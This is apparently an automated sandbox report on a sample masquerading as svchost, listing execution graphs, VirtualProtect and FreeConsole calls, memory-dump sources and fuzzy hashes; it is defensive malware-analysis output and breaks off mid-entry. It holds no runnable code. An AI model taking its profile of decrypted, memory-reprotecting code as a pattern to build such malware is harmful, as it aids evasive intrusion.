12549->12573 12551 7ffd9b880f20 12553 7ffd9b880fb0 12552->12553 12561 7ffd9b880620 VirtualProtect 12553->12561 12567 7ffd9b881696 12553->12567 12554 7ffd9b881924 12555 7ffd9b881986 12554->12555 12563 7ffd9b881bed 12554->12563 12558 7ffd9b880620 VirtualProtect 12555->12558 12556 7ffd9b880620 VirtualProtect 12557 7ffd9b8818e8 12556->12557 12560 7ffd9b880620 VirtualProtect 12557->12560 12559 7ffd9b8819bb 12558->12559 12578 7ffd9b8807b0 12559->12578 12560->12554 12565 7ffd9b8815e4 12561->12565 12564 7ffd9b880620 VirtualProtect 12563->12564 12570 7ffd9b8819dd 12563->12570 12568 7ffd9b881cac 12564->12568 12566 7ffd9b880620 VirtualProtect 12565->12566 12566->12567 12567->12554 12567->12556 12569 7ffd9b880620 VirtualProtect 12568->12569 12571 7ffd9b881d5f 12569->12571 12570->12549 12572 7ffd9b880620 VirtualProtect 12571->12572 12572->12570 12575 7ffd9b880635 12573->12575 12574 7ffd9b880784 12574->12551 12575->12551 12575->12574 12576 7ffd9b880590 VirtualProtect 12575->12576 12577 7ffd9b88090e 12576->12577 12577->12551 12579 7ffd9b8807b9 12578->12579 12582 7ffd9b880590 12579->12582 12581 7ffd9b88090e 12581->12570 12583 7ffd9b880595 12582->12583 12583->12581 12584 7ffd9b884869 VirtualProtect 12583->12584 12585 7ffd9b884908 12584->12585 12585->12581 12630 7ffd9b880cfd 12631 7ffd9b880d0f 12630->12631 12636 7ffd9b880768 12631->12636 12633 7ffd9b880d4a 12641 7ffd9b880628 12633->12641 12635 7ffd9b880d57 12638 7ffd9b8806f7 12636->12638 12637 7ffd9b880784 12637->12633 12638->12633 12638->12637 12639 7ffd9b880590 VirtualProtect 12638->12639 12640 7ffd9b88090e 12639->12640 12640->12633 12643 7ffd9b88062d 12641->12643 12642 7ffd9b880784 12642->12635 12643->12635 12643->12642 12644 7ffd9b880590 VirtualProtect 12643->12644 12645 7ffd9b88090e 12644->12645 12645->12635 12534 7ffd9b8833e9 12535 7ffd9b8833ff 12534->12535 12538 7ffd9b8805a8 12535->12538 12537 7ffd9b88345e 12538->12537 12539 7ffd9b883670 VirtualProtect 12538->12539 12541 7ffd9b884908 12539->12541 12541->12537 12586 7ffd9b8847a6 12587 7ffd9b8847d1 VirtualProtect 12586->12587 12589 7ffd9b884908 12587->12589

                                                                          Executed Functions

                                                                          Function 00007FFD9B883740 Relevance: 1.7, APIs: 1, Instructions: 211COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 441 7ffd9b883740-7ffd9b884906 VirtualProtect 447 7ffd9b88490e-7ffd9b884968 441->447 448 7ffd9b884908 441->448 448->447
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2009551549.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b880000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e18a69a343682144af7a627a0bce0573d0a2dcec357953ae9b1446aea668d37
                                                                          • Instruction ID: 098e8e6b546b0d5cd617a77b203745698a4e5421bedb63b616375d4717016522
                                                                          • Opcode Fuzzy Hash: 5e18a69a343682144af7a627a0bce0573d0a2dcec357953ae9b1446aea668d37
                                                                          • Instruction Fuzzy Hash: 62618170909B4C8FDB58EF98C895AE9BBF0FF19310F1041AED059972A2DB74A941CB41
                                                                          Function 00007FFD9B8847A6 Relevance: 1.7, APIs: 1, Instructions: 202memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 544 7ffd9b8847a6-7ffd9b8847cf 545 7ffd9b8847d1-7ffd9b8847d9 544->545 546 7ffd9b8847da-7ffd9b884906 VirtualProtect 544->546 545->546 550 7ffd9b88490e-7ffd9b884968 546->550 551 7ffd9b884908 546->551 551->550
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2009551549.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b880000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: f2997479f0f2e8eea82eed9a219091bccb2cd6a0c15f5311b692da3812c2ed72
                                                                          • Instruction ID: 9f528366f551fe0ca2ee992eb64315967b4d5c26dae76075c0a6238e06a822a8
                                                                          • Opcode Fuzzy Hash: f2997479f0f2e8eea82eed9a219091bccb2cd6a0c15f5311b692da3812c2ed72
                                                                          • Instruction Fuzzy Hash: 81517F7090874C8FDB58DF68C855BE9BBF1FB5A310F1402AED049E3292DB74A881CB41
                                                                          Function 00007FFD9B895D7A Relevance: 1.7, APIs: 1, Instructions: 173memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 554 7ffd9b895d7a-7ffd9b899c07 VirtualProtect 558 7ffd9b899c09 554->558 559 7ffd9b899c0f-7ffd9b899c5d 554->559 558->559
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2009551549.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b880000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 1251cf25156c06b9b1abd56414be1d13e4c5e447eeb97e0446510d4c04f94fbe
                                                                          • Instruction ID: 8eeda2b4b546946926a74824f2c0a0199592a5e0c8ccff4f071bac3f0ad03652
                                                                          • Opcode Fuzzy Hash: 1251cf25156c06b9b1abd56414be1d13e4c5e447eeb97e0446510d4c04f94fbe
                                                                          • Instruction Fuzzy Hash: 5B512874918A1C8FDB58DF98C885BEDBBF1FB69314F10426ED44AE3251DB70A981CB81
                                                                          Function 00007FFD9B880A0D Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 561 7ffd9b880a0d-7ffd9b880a19 562 7ffd9b880a24-7ffd9b880adf FreeConsole 561->562 563 7ffd9b880a1b-7ffd9b880a23 561->563 567 7ffd9b880ae1 562->567 568 7ffd9b880ae7-7ffd9b880b2d 562->568 563->562 567->568
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2009551549.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b880000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: a77df8943f9ddad278ac432f1cf19260f7837383567197514d62bf189222af45
                                                                          • Instruction ID: f8900d5a8cd6790f8d3c20e70e411b835f9b907359b6847885d90f5de41aa298
                                                                          • Opcode Fuzzy Hash: a77df8943f9ddad278ac432f1cf19260f7837383567197514d62bf189222af45
                                                                          • Instruction Fuzzy Hash: 62418F34A0875C8FDB54DF98C889BEDBBF0FB1A311F1002AAD049D7252DB74A945CB41
                                                                          Function 00007FFD9B8804BA Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 570 7ffd9b8804ba-7ffd9b880a80 573 7ffd9b880a88-7ffd9b880adf FreeConsole 570->573 574 7ffd9b880ae1 573->574 575 7ffd9b880ae7-7ffd9b880b2d 573->575 574->575
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2009551549.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b880000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 389b9f4190c45f875ebad5a1bae35767b6a8ee0501bdde4bca3a79c678f09d6d
                                                                          • Instruction ID: 652b5139ec7cbeae02e895c8ef6ac3f265438811d7997db50b912ece0659f08a
                                                                          • Opcode Fuzzy Hash: 389b9f4190c45f875ebad5a1bae35767b6a8ee0501bdde4bca3a79c678f09d6d
                                                                          • Instruction Fuzzy Hash: 10316C74A08B1C8FEB54DF98D889BEDB7F0FB19311F10426AD00AE7252DB74A945CB50
                                                                          Function 00007FFD9B95026B Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 990 7ffd9b95026b-7ffd9b95026d 991 7ffd9b9503b1-7ffd9b9503b7 990->991 992 7ffd9b95026e-7ffd9b95027c 990->992 995 7ffd9b9503b9-7ffd9b9503c8 991->995 994 7ffd9b950284-7ffd9b950286 992->994 996 7ffd9b9502f7-7ffd9b950306 994->996 997 7ffd9b950288-7ffd9b950289 994->997 999 7ffd9b9503c9-7ffd9b9503e1 995->999 998 7ffd9b950307-7ffd9b950309 996->998 1000 7ffd9b95024f-7ffd9b950255 997->1000 1001 7ffd9b95028b 997->1001 998->991 1004 7ffd9b95030a-7ffd9b950348 998->1004 1002 7ffd9b9501f2-7ffd9b950222 1000->1002 1003 7ffd9b950257-7ffd9b95026a 1000->1003 1001->998 1005 7ffd9b95028d 1001->1005 1002->991 1006 7ffd9b950228-7ffd9b950235 1002->1006 1003->990 1004->995 1020 7ffd9b95034a-7ffd9b95034d 1004->1020 1008 7ffd9b9502d4 1005->1008 1009 7ffd9b95028f-7ffd9b9502a0 1005->1009 1010 7ffd9b950236-7ffd9b95023b 1006->1010 1008->991 1011 7ffd9b9502da-7ffd9b9502f5 1008->1011 1009->1010 1016 7ffd9b9502a2-7ffd9b9502b8 1009->1016 1010->991 1014 7ffd9b95023c-7ffd9b95024e 1010->1014 1011->996 1014->1000 1016->991 1017 7ffd9b9502be-7ffd9b9502d1 1016->1017 1017->1008 1020->999 1021 7ffd9b95034f 1020->1021 1022 7ffd9b950351-7ffd9b95035f 1021->1022 1023 7ffd9b950396-7ffd9b9503b0 1021->1023 1022->1023
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2010261542.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b950000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: A
                                                                          • API String ID: 0-3554254475
                                                                          • Opcode ID: 90fa9a49c01ecb2fcdf1b0e8748483793304b74c24f412086b12f00ee92532c3
                                                                          • Instruction ID: bab7ef504c7ada31db0fc9616448fc2f5dcb99b7f4fac987581718be76a17679
                                                                          • Opcode Fuzzy Hash: 90fa9a49c01ecb2fcdf1b0e8748483793304b74c24f412086b12f00ee92532c3
                                                                          • Instruction Fuzzy Hash: 33619E30A1DA8D8FDB6ADF58C861AF87BE0FF55304F1505AED44ECB192CA75A942C740
                                                                          Function 00007FFD9B951382 Relevance: .1, Instructions: 131COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2010261542.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b950000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d51fe118379f3b866095e7569d91f1c39e57e5f0cf2c633a751134ccf24b10d
                                                                          • Instruction ID: 7a10e899aeae7a174a68fe3bdc2162b1bbea783f4f28e63bea3a01dcfcddfe01
                                                                          • Opcode Fuzzy Hash: 6d51fe118379f3b866095e7569d91f1c39e57e5f0cf2c633a751134ccf24b10d
                                                                          • Instruction Fuzzy Hash: A8313B3155EA9D4FDB1ADF64C8650B43BB1FF16304B0642ABD44ACB0E7DA69B942C740

                                                                          Execution Graph

                                                                          Execution Coverage:10.3%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:79
                                                                          Total number of Limit Nodes:4
                                                                          execution_graph 13814 7ffd9b8a3635 13815 7ffd9b8a3653 VirtualProtect 13814->13815 13817 7ffd9b8a4908 13815->13817 13804 7ffd9b8a433a 13805 7ffd9b8a4349 13804->13805 13810 7ffd9b8a3740 13805->13810 13807 7ffd9b8a3740 VirtualProtect 13809 7ffd9b8a44b0 13807->13809 13811 7ffd9b8a3749 VirtualProtect 13810->13811 13813 7ffd9b8a4425 13811->13813 13813->13807 13844 7ffd9b8a04ba 13845 7ffd9b8a0a30 FreeConsole 13844->13845 13847 7ffd9b8a0ae1 13845->13847 13744 7ffd9b8b5d7a 13745 7ffd9b8b9af0 VirtualProtect 13744->13745 13747 7ffd9b8b9c09 13745->13747 13748 7ffd9b8a496d 13749 7ffd9b8a497b 13748->13749 13752 7ffd9b8a37d8 13749->13752 13751 7ffd9b8a49df 13754 7ffd9b8a3707 13752->13754 13753 7ffd9b8a37f4 13753->13751 13754->13753 13755 7ffd9b8a4869 VirtualProtect 13754->13755 13756 7ffd9b8a4908 13755->13756 13756->13751 13795 7ffd9b8a380d 13796 7ffd9b8a3707 13795->13796 13797 7ffd9b8a37f4 13796->13797 13798 7ffd9b8a4869 VirtualProtect 13796->13798 13799 7ffd9b8a4908 13798->13799 13818 7ffd9b8a05cd 13820 7ffd9b8a05db 13818->13820 13819 7ffd9b8a0784 13820->13819 13821 7ffd9b8a0590 VirtualProtect 13820->13821 13822 7ffd9b8a090e 13821->13822 13848 7ffd9b8a0cad 13849 7ffd9b8a0cbf 13848->13849 13852 7ffd9b8a05a0 13849->13852 13851 7ffd9b8a0ceb 13853 7ffd9b8a05a5 13852->13853 13853->13851 13854 7ffd9b8a4869 VirtualProtect 13853->13854 13855 7ffd9b8a4908 13854->13855 13855->13851 13757 7ffd9b8a33e9 13758 7ffd9b8a33ff 13757->13758 13761 7ffd9b8a05a8 13758->13761 13760 7ffd9b8a345e 13761->13760 13762 7ffd9b8a3670 VirtualProtect 13761->13762 13764 7ffd9b8a4908 13762->13764 13764->13760 13782 7ffd9b8a19a9 13783 7ffd9b8a19bb 13782->13783 13786 7ffd9b8a07b0 13783->13786 13785 7ffd9b8a19dd 13787 7ffd9b8a07b9 13786->13787 13788 7ffd9b8a0590 VirtualProtect 13787->13788 13789 7ffd9b8a090e 13788->13789 13789->13785 13828 7ffd9b8a0cfd 13829 7ffd9b8a0d0f 13828->13829 13834 7ffd9b8a0768 13829->13834 13831 7ffd9b8a0d4a 13839 7ffd9b8a0628 13831->13839 13833 7ffd9b8a0d57 13836 7ffd9b8a06f7 13834->13836 13835 7ffd9b8a0784 13835->13831 13836->13831 13836->13835 13837 7ffd9b8a0590 VirtualProtect 13836->13837 13838 7ffd9b8a090e 13837->13838 13838->13831 13841 7ffd9b8a062d 13839->13841 13840 7ffd9b8a0784 13840->13833 13841->13833 13841->13840 13842 7ffd9b8a0590 VirtualProtect 13841->13842 13843 7ffd9b8a090e 13842->13843 13843->13833 13769 7ffd9b8a0e81 13770 7ffd9b8a0e8b 13769->13770 13773 7ffd9b8a0630 13770->13773 13772 7ffd9b8a0f20 13774 7ffd9b8a0635 13773->13774 13774->13772 13775 7ffd9b8a0784 13774->13775 13778 7ffd9b8a0590 13774->13778 13775->13772 13777 7ffd9b8a090e 13777->13772 13779 7ffd9b8a0595 13778->13779 13779->13777 13780 7ffd9b8a4869 VirtualProtect 13779->13780 13781 7ffd9b8a4908 13780->13781 13781->13777

                                                                          Executed Functions

                                                                          Function 00007FFD9B97026B Relevance: 2.3, Strings: 1, Instructions: 1089COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 291 7ffd9b97026b-7ffd9b97026d 292 7ffd9b9703b1-7ffd9b9703b7 291->292 293 7ffd9b97026e-7ffd9b97027c 291->293 296 7ffd9b9703b9-7ffd9b9703c8 292->296 294 7ffd9b970284-7ffd9b970286 293->294 297 7ffd9b9702f7-7ffd9b970306 294->297 298 7ffd9b970288-7ffd9b970289 294->298 299 7ffd9b9703c9-7ffd9b970427 296->299 302 7ffd9b970307-7ffd9b970309 297->302 300 7ffd9b97024f-7ffd9b970255 298->300 301 7ffd9b97028b 298->301 318 7ffd9b97045c-7ffd9b970474 299->318 319 7ffd9b970429-7ffd9b970440 299->319 306 7ffd9b9701f2-7ffd9b970222 300->306 307 7ffd9b970257-7ffd9b97026a 300->307 301->302 305 7ffd9b97028d 301->305 302->292 303 7ffd9b97030a-7ffd9b970348 302->303 303->296 331 7ffd9b97034a-7ffd9b97034d 303->331 309 7ffd9b9702d4 305->309 310 7ffd9b97028f-7ffd9b9702a0 305->310 306->292 311 7ffd9b970228-7ffd9b970231 306->311 307->291 309->292 317 7ffd9b9702da-7ffd9b9702f5 309->317 316 7ffd9b970234-7ffd9b97023b 310->316 320 7ffd9b9702a2-7ffd9b9702b8 310->320 311->316 316->292 321 7ffd9b970241-7ffd9b97024e 316->321 317->297 324 7ffd9b9704b1-7ffd9b9704d0 319->324 325 7ffd9b970442-7ffd9b97045a 319->325 320->292 327 7ffd9b9702be-7ffd9b9702d1 320->327 321->300 330 7ffd9b9704d1-7ffd9b9704e7 324->330 325->318 325->330 327->309 338 7ffd9b97051c-7ffd9b970534 330->338 339 7ffd9b9704e9-7ffd9b970500 330->339 331->299 334 7ffd9b97034f 331->334 336 7ffd9b970351-7ffd9b97035f 334->336 337 7ffd9b970396-7ffd9b9703b0 334->337 336->337 340 7ffd9b970571-7ffd9b970590 339->340 341 7ffd9b970502-7ffd9b97051a 339->341 346 7ffd9b970592-7ffd9b970595 340->346 347 7ffd9b970597-7ffd9b9705a7 340->347 341->338 346->347 350 7ffd9b9705dc-7ffd9b9705f4 347->350 351 7ffd9b9705a9-7ffd9b9705c0 347->351 352 7ffd9b970631-7ffd9b970668 351->352 353 7ffd9b9705c2-7ffd9b9705da 351->353 359 7ffd9b97069d-7ffd9b9706a8 352->359 360 7ffd9b97066a-7ffd9b97067a 352->360 353->350 366 7ffd9b9706bc-7ffd9b9706c5 359->366 367 7ffd9b9706aa-7ffd9b9706b9 359->367 361 7ffd9b9706eb-7ffd9b9706f9 360->361 362 7ffd9b97067c-7ffd9b97067e 360->362 365 7ffd9b9706fa-7ffd9b97073c 361->365 364 7ffd9b970680 362->364 362->365 370 7ffd9b970682-7ffd9b97069c 364->370 371 7ffd9b9706c6-7ffd9b9706c7 364->371 375 7ffd9b97073e 365->375 376 7ffd9b970786-7ffd9b97078b 365->376 366->371 367->366 370->359 377 7ffd9b970742-7ffd9b970772 375->377 378 7ffd9b970a42-7ffd9b970a56 376->378 379 7ffd9b97078c-7ffd9b97079e 376->379 377->378 380 7ffd9b970778-7ffd9b970781 377->380 387 7ffd9b970a57-7ffd9b970ab7 378->387 381 7ffd9b97079f-7ffd9b9707a3 379->381 382 7ffd9b970784-7ffd9b970785 380->382 383 7ffd9b9707a5 381->383 384 7ffd9b9707a6-7ffd9b9707bd 381->384 382->376 383->377 383->384 384->378 388 7ffd9b9707c3-7ffd9b9707d6 384->388 391 7ffd9b970aec-7ffd9b970b04 387->391 392 7ffd9b970ab9-7ffd9b970ad0 387->392 397 7ffd9b970847-7ffd9b970856 388->397 398 7ffd9b9707d8-7ffd9b9707d9 388->398 394 7ffd9b970b41-7ffd9b970b77 391->394 392->394 395 7ffd9b970ad2-7ffd9b970aeb 392->395 405 7ffd9b970bac-7ffd9b970bc4 394->405 406 7ffd9b970b79-7ffd9b970b90 394->406 395->391 402 7ffd9b970857-7ffd9b970859 397->402 398->381 399 7ffd9b9707db 398->399 399->402 403 7ffd9b9707dd 399->403 402->378 407 7ffd9b97085a-7ffd9b970872 402->407 408 7ffd9b970824 403->408 409 7ffd9b9707df-7ffd9b9707f0 403->409 410 7ffd9b970c01-7ffd9b970c50 406->410 411 7ffd9b970b92-7ffd9b970bab 406->411 422 7ffd9b9708e3-7ffd9b9708f0 407->422 423 7ffd9b970874-7ffd9b970877 407->423 408->378 415 7ffd9b97082a-7ffd9b970845 408->415 409->382 419 7ffd9b9707f2-7ffd9b970808 409->419 431 7ffd9b970cc1-7ffd9b970cfe 410->431 432 7ffd9b970c52-7ffd9b970c84 410->432 411->405 415->397 419->378 425 7ffd9b97080e-7ffd9b970821 419->425 427 7ffd9b9708f3 422->427 423->427 428 7ffd9b970879 423->428 425->408 427->378 433 7ffd9b9708f9-7ffd9b97090c 427->433 429 7ffd9b9708c0 428->429 430 7ffd9b97087b-7ffd9b9708a2 428->430 435 7ffd9b9708c3-7ffd9b9708e1 429->435 436 7ffd9b9708c2 429->436 430->378 439 7ffd9b9708a8-7ffd9b9708be 430->439 445 7ffd9b97097d-7ffd9b970990 433->445 446 7ffd9b97090e-7ffd9b970912 433->446 435->422 436->435 439->378 439->429 447 7ffd9b970993 445->447 446->447 449 7ffd9b970914 446->449 447->378 450 7ffd9b970999-7ffd9b9709b5 447->450 451 7ffd9b970974-7ffd9b97097b 449->451 454 7ffd9b9709d2-7ffd9b9709e6 450->454 455 7ffd9b9709b7-7ffd9b9709cc 450->455 451->445 454->387 456 7ffd9b9709e8-7ffd9b9709ed 454->456 455->454 456->451 458 7ffd9b9709ef 456->458 458->378
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1972138673.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b970000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: A
                                                                          • API String ID: 0-3554254475
                                                                          • Opcode ID: cc3987cd2a9fb9d711924ab44e78ad9f792ad3ba54f73d83a30ea9ee732b82c3
                                                                          • Instruction ID: 3405ddc5a8cb773090993712d7b4ae703d9b53984adee5d02067f6c2b46c1c7c
                                                                          • Opcode Fuzzy Hash: cc3987cd2a9fb9d711924ab44e78ad9f792ad3ba54f73d83a30ea9ee732b82c3
                                                                          • Instruction Fuzzy Hash: 93728C31A1E7895FDF65CB68C8A55A47FE0FF95700F0A06FED08DCB1A2DA246906C781
                                                                          Function 00007FFD9B8A3740 Relevance: 1.8, APIs: 1, Instructions: 270COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 609 7ffd9b8a3740-7ffd9b8a4906 VirtualProtect 615 7ffd9b8a4908 609->615 616 7ffd9b8a490e-7ffd9b8a4968 609->616 615->616
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1969659352.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 87891662af74d9234ff53513049f8acededd8650d87da73cd6395334819e227e
                                                                          • Instruction ID: 412ca4980512ac1602c24f685036820044ed0c5f76e3e70ba9c18e54248caf32
                                                                          • Opcode Fuzzy Hash: 87891662af74d9234ff53513049f8acededd8650d87da73cd6395334819e227e
                                                                          • Instruction Fuzzy Hash: 8891E4B190D68C8FDB59DF98D8A5AE87BF0FF16314F0401BED089972A3EA346945CB41
                                                                          Function 00007FFD9B8A47A6 Relevance: 1.7, APIs: 1, Instructions: 202memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 712 7ffd9b8a47a6-7ffd9b8a47cf 713 7ffd9b8a47da-7ffd9b8a4906 VirtualProtect 712->713 714 7ffd9b8a47d1-7ffd9b8a47d9 712->714 718 7ffd9b8a4908 713->718 719 7ffd9b8a490e-7ffd9b8a4968 713->719 714->713 718->719
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1969659352.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 177e845c0d66ac708e524cc20289556cd677f5e8c4ba8a7afb3c2348e5374c02
                                                                          • Instruction ID: c5aba688bf4c1b375049b4bf32ac1a23a94522d8f6695c9398ed74e6d9bfed62
                                                                          • Opcode Fuzzy Hash: 177e845c0d66ac708e524cc20289556cd677f5e8c4ba8a7afb3c2348e5374c02
                                                                          • Instruction Fuzzy Hash: 48517F7090874C8FDB58DF68C895BE9BBF0FB5A310F1442AED049E3292DB74A885CB41
                                                                          Function 00007FFD9B8B5D7A Relevance: 1.7, APIs: 1, Instructions: 173memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 722 7ffd9b8b5d7a-7ffd9b8b9c07 VirtualProtect 726 7ffd9b8b9c09 722->726 727 7ffd9b8b9c0f-7ffd9b8b9c5d 722->727 726->727
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1969659352.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: b814a722f4dab48a100f94a665e05b3ee0f650a0d81f61a330cb18c8505532da
                                                                          • Instruction ID: 7480ef5e584ce30629708b8527eb9e55ae1cc6a212bd87b67aaa172c4afb7595
                                                                          • Opcode Fuzzy Hash: b814a722f4dab48a100f94a665e05b3ee0f650a0d81f61a330cb18c8505532da
                                                                          • Instruction Fuzzy Hash: EA513A7091861C8FDB58DF98C889BEDBBF1FB69310F10426ED44AE3251DB70A981CB81
                                                                          Function 00007FFD9B8A0A0D Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 729 7ffd9b8a0a0d-7ffd9b8a0a19 730 7ffd9b8a0a1b-7ffd9b8a0a23 729->730 731 7ffd9b8a0a24-7ffd9b8a0adf FreeConsole 729->731 730->731 735 7ffd9b8a0ae7-7ffd9b8a0b2d 731->735 736 7ffd9b8a0ae1 731->736 736->735
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1969659352.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 5dc6d9aaa757d76c70d49a5396d6ec0cd4e8d21fb71b9ad02441eb8f8acd071d
                                                                          • Instruction ID: 5baf194f44b338c55ecad333380663aeb053750f55ca5f05eb54cccbf1d605c9
                                                                          • Opcode Fuzzy Hash: 5dc6d9aaa757d76c70d49a5396d6ec0cd4e8d21fb71b9ad02441eb8f8acd071d
                                                                          • Instruction Fuzzy Hash: D0418F34A0875C8FDB54DF98D889BEDBBF0FB1A311F1001AAD049D7292DB74A945CB51
                                                                          Function 00007FFD9B8A04BA Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 738 7ffd9b8a04ba-7ffd9b8a0a80 741 7ffd9b8a0a88-7ffd9b8a0adf FreeConsole 738->741 742 7ffd9b8a0ae7-7ffd9b8a0b2d 741->742 743 7ffd9b8a0ae1 741->743 743->742
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1969659352.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 69c462d13083fb14242d3baa2a2989662032da44aea96315fd0228cc75da8a4d
                                                                          • Instruction ID: 2817f09ccf70d877e423d951d9c9eca740b244cc188c672a5da6979135c399b6
